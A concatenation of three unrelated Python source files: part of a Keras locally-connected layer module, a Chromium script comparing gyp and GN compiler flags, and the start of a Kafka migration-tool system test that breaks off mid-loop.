implementation=1,
**kwargs):
super(LocallyConnected1D, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 1, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 1, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.padding != 'valid' and implementation == 1:
raise ValueError('Invalid border mode for LocallyConnected1D '
'(only "valid" is supported if implementation is 1): '
+ padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.implementation = implementation
self.input_spec = InputSpec(ndim=3)
@tf_utils.shape_type_conversion
def build(self, input_shape):
if self.data_format == 'channels_first':
input_dim, input_length = input_shape[1], input_shape[2]
else:
input_dim, input_length = input_shape[2], input_shape[1]
if input_dim is None:
raise ValueError('Axis 2 of input should be fully-defined. '
'Found shape:', input_shape)
self.output_length = conv_utils.conv_output_length(
input_length, self.kernel_size[0], self.padding, self.strides[0])
if self.implementation == 1:
self.kernel_shape = (self.output_length, self.kernel_size[0] * input_dim,
self.filters)
self.kernel = self.add_weight(
shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
elif self.implementation == 2:
if self.data_format == 'channels_first':
self.kernel_shape = (input_dim, input_length,
self.filters, self.output_length)
else:
self.kernel_shape = (input_length, input_dim,
self.output_length, self.filters)
self.kernel = self.add_weight(shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.kernel_mask = get_locallyconnected_mask(
input_shape=(input_length,),
kernel_shape=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dtype=self.kernel.dtype
)
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
self.bias = self.add_weight(
shape=(self.output_length, self.filters),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
if self.data_format == 'channels_first':
self.input_spec = InputSpec(ndim=3, axes={1: input_dim})
else:
self.input_spec = InputSpec(ndim=3, axes={-1: input_dim})
self.built = True
@tf_utils.shape_type_conversion
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_first':
input_length = input_shape[2]
else:
input_length = input_shape[1]
length = conv_utils.conv_output_length(input_length, self.kernel_size[0],
self.padding, self.strides[0])
if self.data_format == 'channels_first':
return (input_shape[0], self.filters, length)
elif self.data_format == 'channels_last':
return (input_shape[0], length, self.filters)
def call(self, inputs):
if self.implementation == 1:
output = K.local_conv(inputs, self.kernel, self.kernel_size, self.strides,
(self.output_length,), self.data_format)
elif self.implementation == 2:
output = local_conv_matmul(inputs, self.kernel, self.kernel_mask,
self.compute_output_shape(inputs.shape))
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
output = K.bias_add(output, self.bias, data_format=self.data_format)
output = self.activation(output)
return output
def get_config(self):
config = {
'filters':
self.filters,
'kernel_size':
self.kernel_size,
'strides':
self.strides,
'padding':
self.padding,
'data_format':
self.data_format,
'activation':
activations.serialize(self.activation),
'use_bias':
self.use_bias,
'kernel_initializer':
initializers.serialize(self.kernel_initializer),
'bias_initializer':
initializers.serialize(self.bias_initializer),
'kernel_regularizer':
regularizers.serialize(self.kernel_regularizer),
'bias_regularizer':
regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint':
constraints.serialize(self.kernel_constraint),
'bias_constraint':
constraints.serialize(self.bias_constraint),
'implementation':
self.implementation
}
base_config = super(LocallyConnected1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@tf_export('keras.layers.LocallyConnected2D')
class LocallyConnected2D(Layer):
"""Locally-connected layer for 2D inputs.
The `LocallyConnected2D` layer works similarly
to the `Conv2D` layer, except that weights are unshared,
that is, a different set of filters is applied at each
different patch of the input.
Examples:
```python
  # apply a 3x3 unshared weights convolution with 64 output filters on a
  # 32x32 image with `data_format="channels_last"`:
  model = Sequential()
  model.add(LocallyConnected2D(64, (3, 3), input_shape=(32, 32, 3)))
  # now model.output_shape == (None, 30, 30, 64)
  # notice that this layer will consume (30*30)*(3*3*3*64) + (30*30)*64
  # parameters
# add a 3x3 unshared weights convolution on top, with 32 output filters:
model.add(LocallyConnected2D(32, (3, 3)))
# now model.output_shape == (None, 28, 28, 32)
```
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
    padding: Currently only supports `"valid"` (case-insensitive).
      `"same"` may be supported in the future.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
implementation: implementation mode, either `1` or `2`.
`1` loops over input spatial locations to perform the forward pass.
It is memory-efficient but performs a lot of (small) ops.
`2` stores layer weights in a dense but sparsely-populated 2D matrix
and implements the forward pass as a single matrix-multiply. It uses
a lot of RAM but performs few (large) ops.
Depending on the inputs, layer parameters, hardware, and
`tf.executing_eagerly()` one implementation can be dramatically faster
(e.g. 50X) than another.
It is recommended to benchmark both in the setting of interest to pick
the most efficient one (in terms of speed and memory usage).
Following scenarios could benefit from setting `implementation=2`:
- eager execution;
- inference;
- running on CPU;
- large amount of RAM available;
- small models (few filters, small kernel);
- using `padding=same` (only possible with `implementation=2`).
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
implementation=1,
**kwargs):
super(LocallyConnected2D, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 2, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.padding != 'valid' and implementation == 1:
raise ValueError('Invalid border mode for LocallyConnected2D '
'(only "valid" is supported if implementation is 1): '
+ padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.implementation = implementation
self.input_spec = InputSpec(ndim=4)
@tf_utils.shape_type_conversion
def build(self, input_shape):
if self.data_format == 'channels_last':
input_row, input_col = input_shape[1:-1]
input_filter = input_shape[3]
else:
input_row, input_col = input_shape[2:]
input_filter = input_shape[1]
if input_row is None or input_col is None:
raise ValueError('The spatial dimensions of the inputs to '
' a LocallyConnected2D layer '
'should be fully-defined, but layer received '
'the inputs shape ' + str(input_shape))
output_row = conv_utils.conv_output_length(input_row, self.kernel_size[0],
self.padding, self.strides[0])
output_col = conv_utils.conv_output_length(input_col, self.kernel_size[1],
self.padding, self.strides[1])
self.output_row = output_row
self.output_col = output_col
if self.implementation == 1:
self.kernel_shape = (
output_row * output_col,
self.kernel_size[0] * self.kernel_size[1] * input_filter,
self.filters)
self.kernel = self.add_weight(
shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
elif self.implementation == 2:
if self.data_format == 'channels_first':
self.kernel_shape = (input_filter, input_row, input_col,
self.filters, self.output_row, self.output_col)
else:
self.kernel_shape = (input_row, input_col, input_filter,
self.output_row, self.output_col, self.filters)
self.kernel = self.add_weight(shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.kernel_mask = get_locallyconnected_mask(
input_shape=(input_row, input_col),
kernel_shape=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dtype=self.kernel.dtype
)
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
self.bias = self.add_weight(
shape=(output_row, output_col, self.filters),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
if self.data_format == 'channels_first':
self.input_spec = InputSpec(ndim=4, axes={1: input_filter})
else:
self.input_spec = InputSpec(ndim=4, axes={-1: input_filter})
self.built = True
@tf_utils.shape_type_conversion
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_first':
rows = input_shape[2]
cols = input_shape[3]
elif self.data_format == 'channels_last':
rows = input_shape[1]
cols = input_shape[2]
rows = conv_utils.conv_output_length(rows, self.kernel_size[0],
self.padding, self.strides[0])
cols = conv_utils.conv_output_length(cols, self.kernel_size[1],
self.padding, self.strides[1])
if self.data_format == 'channels_first':
return (input_shape[0], self.filters, rows, cols)
elif self.data_format == 'channels_last':
return (input_shape[0], rows, cols, self.filters)
def call(self, inputs):
if self.implementation == 1:
output = K.local_conv(inputs, self.kernel, self.kernel_size, self.strides,
(self.output_row, self.output_col),
self.data_format)
elif self.implementation == 2:
output = local_conv_matmul(inputs, self.kernel, self.kernel_mask,
self.compute_output_shape(inputs.shape))
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
output = K.bias_add(output, self.bias, data_format=self.data_format)
output = self.activation(output)
return output
def get_config(self):
config = {
'filters':
self.filters,
'kernel_size':
self.kernel_size,
'strides':
self.strides,
'padding':
self.padding,
'data_format':
self.data_format,
'activation':
activations.serialize(self.activation),
'use_bias':
self.use_bias,
'kernel_initializer':
initializers.serialize(self.kernel_initializer),
'bias_initializer':
initializers.serialize(self.bias_initializer),
'kernel_regularizer':
regularizers.serialize(self.kernel_regularizer),
'bias_regularizer':
regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint':
constraints.serialize(self.kernel_constraint),
'bias_constraint':
constraints.serialize(self.bias_constraint),
'implementation':
self.implementation
}
base_config = super(LocallyConnected2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def get_locallyconnected_mask(input_shape,
kernel_shape,
strides,
padding,
data_format,
dtype):
"""Return a mask representing connectivity of a locally-connected operation.
This method returns a masking tensor of 0s and 1s (of type `dtype`) that,
when element-wise multiplied with a fully-connected weight tensor, masks out
the weights between disconnected input-output pairs and thus implements local
connectivity through a sparse fully-connected weight tensor.
Assume an unshared convolution with given parameters is applied to an input
having N spatial dimensions with `input_shape = (d_in1, ..., d_inN)`
to produce an output with spatial shape `(d_out1, ..., d_outN)` (determined
by layer parameters such as `strides`).
This method returns a mask which can be broadcast-multiplied (element-wise)
with a 2*(N+1)-D weight matrix (equivalent to a fully-connected layer between
(N+1)-D activations (N spatial + 1 channel dimensions for input and output)
to make it perform an unshared convolution with given `kernel_shape`,
`strides`, `padding` and `data_format`.
Arguments:
input_shape: tuple of size N: `(d_in1, ..., d_inN)`
spatial shape of the input.
kernel_shape: tuple of size N, spatial shape of the convolutional kernel
/ receptive field.
strides: tuple of size N, strides along each spatial dimension.
padding: type of padding, string `"same"` or `"valid"`.
data_format: a string, `"channels_first"` or `"channels_last"`.
dtype: type of the layer operation, e.g. `tf.float64`.
Returns:
a `dtype`-tensor of shape
`(1, d_in1, ..., d_inN, 1, d_out1, ..., d_outN)`
if `data_format == `"channels_first"`, or
`(d_in1, ..., d_inN, 1, d_out1, ..., d_outN, 1)`
if `data_format == "channels_last"`.
Raises:
ValueError: if `data_format` is neither `"channels_first"` nor
`"channels_last"`.
"""
mask = conv_utils.conv_kernel_mask(
input_shape=input_shape,
kernel_shape=kernel_shape,
strides=strides,
padding=padding
)
ndims = int(mask.ndim / 2)
mask = K.variable(mask, dtype)
if data_format == 'channels_first':
mask = K.expand_dims(mask, 0)
    mask = K.expand_dims(mask, -ndims - 1)
elif data_format == 'channels_last':
mask = K.expand_dims(mask, ndims)
mask = K.expand_dims(mask, -1)
else:
raise ValueError('Unrecognized data_format: ' + str(data_format))
return mask
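# A worked example of the mask shapes (hypothetical numbers): for a 1-D input of
# length 5, kernel size 3, stride 1 and 'valid' padding, conv_kernel_mask returns
# a (5, 3) 0/1 array (input length x output length); with channels_last this is
# expanded to (5, 1, 3, 1), ready to broadcast against the (5, in, 3, out) kernel.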
def local_conv_matmul(inputs, kernel, kernel_mask, output_shape):
"""Apply N-D convolution with un-shared weights using a single matmul call.
This method outputs `inputs . (kernel * kernel_mask)`
(with `.` standing for matrix-multiply and `*` for element-wise multiply)
and requires a precomputed `kernel_mask` to zero-out weights in `kernel` and
hence perform the same operation as a convolution with un-shared
(the remaining entries in `kernel`) weights. It also does the necessary
reshapes to make `inputs` and `kernel` 2-D and `output` (N+2)-D.
Arguments:
inputs: (N+2)-D tensor with shape
`(batch_size, channels_in, d_in1, ..., d_inN)`
or
`(batch_size, d_in1, ..., d_inN, channels_in)`.
kernel: the unshared weights for N-D convolution,
an (N+2)-D tensor of shape:
`(d_in1, ..., d_inN, channels_in, d_out2, ..., d_outN, channels_out)`
or
`(channels_in, d_in1, ..., d_inN, channels_out, d_out2, ..., d_outN)`,
with the ordering of channels and spatial dimensions matching
that of the input.
Each entry is the weight between a particular input and
output location, similarly to a fully-connected weight matrix.
kernel_mask: a float 0/1 mask tensor of shape:
`(d_in1, ..., d_inN, 1, d_out2, ..., d_outN, 1)`
or
`(1, d_in1, ..., d_inN, 1, d_out2, ..., d_outN)`,
with the ordering of singleton and spatial dimensions
matching that of the input.
Mask represents the connectivity pattern of the layer and is
precomputed elsewhere based on layer parameters: stride,
padding, and the receptive field shape.
output_shape: a tuple of (N+2) elements representing the output shape:
`(batch_size, channels_out, d_out1, ..., d_outN)`
or
`(batch_size, d_out1, ..., d_outN, channels_out)`,
with the ordering of channels and spatial dimensions matching that of
the input.
Returns:
Output (N+2)-D tensor with shape `output_shape`.
"""
inputs_flat = K.reshape(inputs, (K.shape(inputs)[0], -1))
kernel = kernel_mask * kernel
kernel = make_2d(kernel, split_dim=K.ndim(kernel) // 2)
output_flat = K.math_ops.sparse_matmul(inputs_flat, kernel, b_is_sparse=True)
output = K.reshape(output_flat,
[K.shape(output_flat)[0],] + output_shape.as_list()[1:])
return output
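# Shape sketch for local_conv_matmul (hypothetical 1-D case, channels_last):
# inputs (batch, 5, 2) flatten to (batch, 10); a masked kernel of shape
# (5, 2, 3, 4) becomes (10, 12) via make_2d (split_dim = ndim // 2 = 2); the
# matmul gives (batch, 12), which is reshaped to output_shape (batch, 3, 4).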
def make_2d(tensor, split_dim):
"""Reshapes an N-dimensional tensor into a 2D tensor.
Dimensions before (excluding) and after (including) `split_dim` are grouped
together.
Arguments:
tensor: a tensor of shape `(d0, ..., d(N-1))`.
split_dim: an integer from 1 to N-1, index of the dimension to group
dimensions before (excluding) and after (including).
Returns:
Tensor of shape
`(d0 * ... * d(split_dim-1), d(split_dim) * ... * d(N-1))`.
"""
shape = K.array_ops.shape(tensor)
in_dims = shape[:split_dim]
out_dims = shape[split_dim:]
in_size = K.math_ops.reduce_prod(in_dims)
out_size = K.math_ops.reduce_prod(out_dims)
return K.array_ops.reshape(tensor, (in_size, out_size))
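# Example of make_2d (illustration only): a tensor of shape (2, 3, 4, 5) with
# split_dim=2 is reshaped to (2 * 3, 4 * 5) == (6, 20).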
|
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Given the output of -t commands from a ninja build for a gyp and GN generated
build, report on differences between the command lines."""
import os
import shlex
import subprocess
import sys
# Must be in src/.
os.chdir(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
g_total_differences = 0
def FindAndRemoveArgWithValue(command_line, argname):
"""Given a command line as a list, remove and return the value of an option
that takes a value as a separate entry.
Modifies |command_line| in place.
"""
if argname not in command_line:
return ''
location = command_line.index(argname)
value = command_line[location + 1]
command_line[location:location + 2] = []
return value
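# Example (hypothetical command line):
#   cmd = ['clang', '-o', 'foo.o', 'foo.cc']
#   FindAndRemoveArgWithValue(cmd, '-o')  # returns 'foo.o'; cmd is now ['clang', 'foo.cc']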
def MergeSpacedArgs(command_line, argname):
"""Combine all arguments |argname| with their values, separated by a space."""
i = 0
result = []
while i < len(command_line):
arg = command_line[i]
if arg == argname:
result.append(arg + ' ' + command_line[i + 1])
i += 1
else:
result.append(arg)
i += 1
return result
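# Example: MergeSpacedArgs(['-Xclang', 'foo', '-c'], '-Xclang') returns
# ['-Xclang foo', '-c'], so a flag travels with its value when sorted or compared.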
def NormalizeSymbolArguments(command_line):
"""Normalize -g arguments.
  If there are no -g args, it's equivalent to -g0. -g2 is equivalent to -g.
Modifies |command_line| in place.
"""
  # Strip -g0 if there are no symbols.
have_some_symbols = False
for x in command_line:
if x.startswith('-g') and x != '-g0':
have_some_symbols = True
if not have_some_symbols and '-g0' in command_line:
command_line.remove('-g0')
# Rename -g2 to -g.
if '-g2' in command_line:
    command_line[command_line.index('-g2')] = '-g'
def GetFlags(lines):
"""Turn a list of command lines into a semi-structured dict."""
flags_by_output = {}
for line in lines:
# TODO(scottmg): Hacky way of getting only cc for now.
if 'clang' not in line:
continue
command_line = shlex.split(line.strip())[1:]
output_name = FindAndRemoveArgWithValue(command_line, '-o')
dep_name = FindAndRemoveArgWithValue(command_line, '-MF')
NormalizeSymbolArguments(command_line)
command_line = MergeSpacedArgs(command_line, '-Xclang')
defines = [x for x in command_line if x.startswith('-D')]
include_dirs = [x for x in command_line if x.startswith('-I')]
dash_f = [x for x in command_line if x.startswith('-f')]
warnings = [x for x in command_line if x.startswith('-W')]
cc_file = [x for x in command_line if x.endswith('.cc') or
x.endswith('.c') or
x.endswith('.cpp')]
if len(cc_file) != 1:
print 'Skipping %s' % command_line
continue
assert len(cc_file) == 1
others = [x for x in command_line if x not in defines and \
x not in include_dirs and \
x not in dash_f and \
x not in warnings and \
x not in cc_file]
# Filter for libFindBadConstructs.so having a relative path in one and
# absolute path in the other.
others_filtered = []
for x in others:
if x.startswith('-Xclang ') and x.endswith('libFindBadConstructs.so'):
others_filtered.append(
'-Xclang ' +
os.path.join(os.getcwd(),
os.path.normpath(
os.path.join('out/gn_flags', x.split(' ', 1)[1]))))
elif x.startswith('-B'):
others_filtered.append(
'-B' +
os.path.join(os.getcwd(),
os.path.normpath(os.path.join('out/gn_flags', x[2:]))))
else:
others_filtered.append(x)
others = others_filtered
flags_by_output[cc_file[0]] = {
'output': output_name,
'depname': dep_name,
'defines': sorted(defines),
'include_dirs': sorted(include_dirs), # TODO(scottmg): This is wrong.
'dash_f': sorted(dash_f),
'warnings': sorted(warnings),
'other': sorted(others),
}
return flags_by_output
def CompareLists(gyp, gn, name, dont_care_gyp=None, dont_care_gn=None):
"""Return a report of any differences between gyp and gn lists, ignoring
anything in |dont_care_{gyp|gn}| respectively."""
global g_total_differences
if not dont_care_gyp:
dont_care_gyp = []
if not dont_care_gn:
dont_care_gn = []
output = ''
if gyp[name] != gn[name]:
gyp_set = set(gyp[name])
gn_set = set(gn[name])
missing_in_gyp = gyp_set - gn_set
missing_in_gn = gn_set - gyp_set
missing_in_gyp -= set(dont_care_gyp)
missing_in_gn -= set(dont_care_gn)
if missing_in_gyp or missing_in_gn:
output += ' %s differ:\n' % name
if missing_in_gyp:
output += ' In gyp, but not in GN:\n %s' % '\n '.join(
sorted(missing_in_gyp)) + '\n'
g_total_differences += len(missing_in_gyp)
if missing_in_gn:
output += ' In GN, but not in gyp:\n %s' % '\n '.join(
sorted(missing_in_gn)) + '\n\n'
g_total_differences += len(missing_in_gn)
return output
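# Example (hypothetical flag dicts): comparing {'defines': ['-DA', '-DB']} (gyp)
# with {'defines': ['-DA']} (gn) for name='defines' reports '-DB' under
# "In gyp, but not in GN" and bumps g_total_differences by one.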
def Run(command_line):
"""Run |command_line| as a subprocess and return stdout. Raises on error."""
return subprocess.check_output(command_line, shell=True)
def main():
if len(sys.argv) != 2 and len(sys.argv) != 3:
print 'usage: %s gyp_target gn_target' % __file__
print ' or: %s target' % __file__
return 1
if len(sys.argv) == 2:
sys.argv.append(sys.argv[1])
print >>sys.stderr, 'Regenerating...'
# Currently only Release, non-component.
Run('gn gen out/gn_flags --args="is_debug=false is_component_build=false"')
os.environ.pop('GYP_DEFINES', None)
Run('python build/gyp_chromium -Goutput_dir=out_gyp_flags -Gconfig=Release')
gn = Run('ninja -C out/gn_flags -t commands %s' % sys.argv[2])
gyp = Run('ninja -C out_gyp_flags/Release -t commands %s' % sys.argv[1])
all_gyp_flags = GetFlags(gyp.splitlines())
all_gn_flags = GetFlags(gn.splitlines())
gyp_files = set(all_gyp_flags.keys())
gn_files = set(all_gn_flags.keys())
different_source_list = gyp_files != gn_files
if different_source_list:
print 'Different set of sources files:'
print ' In gyp, not in GN:\n %s' % '\n '.join(
sorted(gyp_files - gn_files))
print ' In GN, not in gyp:\n %s' % '\n '.join(
sorted(gn_files - gyp_files))
print '\nNote that flags will only be compared for files in both sets.\n'
file_list = gyp_files & gn_files
files_with_given_differences = {}
for filename in sorted(file_list):
gyp_flags = all_gyp_flags[filename]
gn_flags = all_gn_flags[filename]
differences = CompareLists(gyp_flags, gn_flags, 'dash_f')
differences += CompareLists(gyp_flags, gn_flags, 'defines')
differences += CompareLists(gyp_flags, gn_flags, 'include_dirs')
differences += CompareLists(gyp_flags, gn_flags, 'warnings', dont_care_gn=[
# More conservative warnings in GN we consider to be OK.
'-Wendif-labels',
'-Wextra',
'-Wsign-compare',
])
differences += CompareLists(gyp_flags, gn_flags, 'other')
if differences:
files_with_given_differences.setdefault(differences, []).append(filename)
for diff, files in files_with_given_differences.iteritems():
print '\n'.join(sorted(files))
print diff
print 'Total differences:', g_total_differences
# TODO(scottmg): Return failure on difference once we're closer to identical.
return 0
if __name__ == '__main__':
sys.exit(main())
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#!/usr/bin/env python
# ===================================
# migration_tool_test.py
# ===================================
import inspect
import logging
import os
import signal
import subprocess
import sys
import time
import traceback
from system_test_env import SystemTestEnv
sys.path.append(SystemTestEnv.SYSTEM_TEST_UTIL_DIR)
from setup_utils import SetupUtils
from replication_utils import ReplicationUtils
import system_test_utils
from testcase_env import TestcaseEnv
# product specific: Kafka
import kafka_system_test_utils
import metrics
class MigrationToolTest(ReplicationUtils, SetupUtils):
testModuleAbsPathName = os.path.realpath(__file__)
testSuiteAbsPathName = os.path.abspath(os.path.dirname(testModuleAbsPathName))
def __init__(self, systemTestEnv):
# SystemTestEnv - provides cluster level environment settings
# such as entity_id, hostname, kafka_home, java_home which
# are available in a list of dictionary named
# "clusterEntityConfigDictList"
self.systemTestEnv = systemTestEnv
super(MigrationToolTest, self).__init__(self)
# dict to pass user-defined attributes to logger argument: "extra"
        self.d = {'name_of_class': self.__class__.__name__}
def signal_handler(self, signal, frame):
self.log_message("Interrupt detected - User pressed Ctrl+c")
# perform the necessary cleanup here when user presses Ctrl+c and it may be product specific
self.log_message("stopping all entities - please wait ...")
kafka_system_test_utils.stop_all_remote_running_processes(self.systemTestEnv, self.testcaseEnv)
sys.exit(1)
def runTest(self):
# ======================================================================
# get all testcase directories under this testsuite
# ======================================================================
testCasePathNameList = system_test_utils.get_dir_paths_with_prefix(
self.testSuiteAbsPathName, SystemTestEnv.SYSTEM_TEST_CASE_PREFIX)
testCasePathNameList.sort()
replicationUtils = ReplicationUtils(self)
# =============================================================
# launch each testcase one by one: testcase_1, testcase_2, ...
# =============================================================
for testCasePathName in testCasePathNameList:
skipThisTestCase = False
try:
# ======================================================================
# A new instance of TestcaseEnv to keep track of this testcase's env vars
# and initialize some env vars as testCasePathName is available now
# ======================================================================
self.testcaseEnv = TestcaseEnv(self.systemTestEnv, self)
self.testcaseEnv.testSuiteBaseDir = self.testSuiteAbsPathName
self.testcaseEnv.initWithKnownTestCasePathName(testCasePathName)
self.testcaseEnv.testcaseArgumentsDict = self.testcaseEnv.testcaseNonEntityDataDict["testcase_args"]
# ======================================================================
# SKIP if this case is IN testcase_to_skip.json or NOT IN testcase_to_run.json
# ======================================================================
testcaseDirName = self.testcaseEnv.testcaseResultsDict["_test_case_name"]
if self.systemTestEnv.printTestDescriptionsOnly:
self.testcaseEnv.printTestCaseDescription(testcaseDirName)
continue
elif self.systemTestEnv.isTestCaseToSkip(self.__class__.__name__, testcaseDirName):
self.log_message("Skipping : " + testcaseDirName)
skipThisTestCase = True
continue
else:
self.testcaseEnv.printTestCaseDescription(testcaseDirName)
system_test_utils.setup_remote_hosts_with_testcase_level_cluster_config(self.systemTestEnv, testCasePathName)
# ============================================================================== #
# ============================================================================== #
# Product Specific Testing Code Starts Here: #
# ============================================================================== #
# ============================================================================== #
# initialize self.testcaseEnv with user-defined environment variables (product specific)
self.testcaseEnv.userDefinedEnvVarDict["zkConnectStr"] = ""
self.testcaseEnv.userDefinedEnvVarDict["stopBackgroundProducer"] = False
self.testcaseEnv.userDefinedEnvVarDict["backgroundProducerStopped"] = False
# initialize signal handler
signal.signal(signal.SIGINT, self.signal_handler)
# TestcaseEnv.testcaseConfigsList initialized by reading testcase properties file:
# system_test/<suite_name>_testsuite/testcase_<n>/testcase_<n>_properties.json
self.testcaseEnv.testcaseConfigsList = system_test_utils.get_json_list_data(
self.testcaseEnv.testcasePropJsonPathName)
# clean up data directories specified in zookeeper.properties and kafka_server_<n>.properties
kafka_system_test_utils.cleanup_data_at_remote_hosts(self.systemTestEnv, self.testcaseEnv)
# create "LOCAL" log directories for metrics, dashboards for each entity under this testcase
# for collecting logs from remote machines
kafka_system_test_utils.generate_testcase_log_dirs(self.systemTestEnv, self.testcaseEnv)
# TestcaseEnv - initialize producer & consumer config / log file pathnames
kafka_system_test_utils.init_entity_props(self.systemTestEnv, self.testcaseEnv)
# generate remote hosts log/config dirs if not exist
kafka_system_test_utils.generate_testcase_log_dirs_in_remote_hosts(self.systemTestEnv, self.testcaseEnv)
# generate properties files for zookeeper, kafka, producer, consumer and mirror-maker:
# 1. copy system_test/<suite_name>_testsuite/config/*.properties to
# system_test/<suite_name>_testsuite/testcase_<n>/config/
# 2. update all properties files in system_test/<suite_name>_testsuite/testcase_<n>/config
# by overriding the settings specified in:
# system_test/<suite_name>_testsuite/testcase_<n>/testcase_<n>_properties.json
kafka_system_test_utils.generate_overriden_props_files(self.testSuiteAbsPathName,
self.testcaseEnv, self.systemTestEnv)
# =============================================
# preparing all entities to start the test
# =============================================
self.log_message("starting zookeepers")
kafka_system_test_utils.start_zookeepers(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 2s")
time.sleep(2)
self.log_message("starting brokers")
kafka_system_test_utils.start_brokers(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 5s")
time.sleep(5)
self.log_message("starting migration tool")
kafka_system_test_utils.start_migration_tool(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 5s")
time.sleep(5)
# =============================================
# starting producer
# =============================================
self.log_message("starting producer in the background")
kafka_system_test_utils.start_producer_performance(self.systemTestEnv, self.testcaseEnv, True)
msgProducingFreeTimeSec = self.testcaseEnv.testcaseArgumentsDict["message_producing_free_time_sec"]
self.anonLogger.info("sleeping for " + msgProducingFreeTimeSec + " sec to produce some messages")
time.sleep(int(msgProducingFreeTimeSec))
# =============================================
# A while-loop to bounce leader as specified
# by "num_iterations" in testcase_n_properties.json
# =============================================
i = 1
numIterations = int(self.testcaseEnv.testcaseArgumentsDict["num_iteration"])
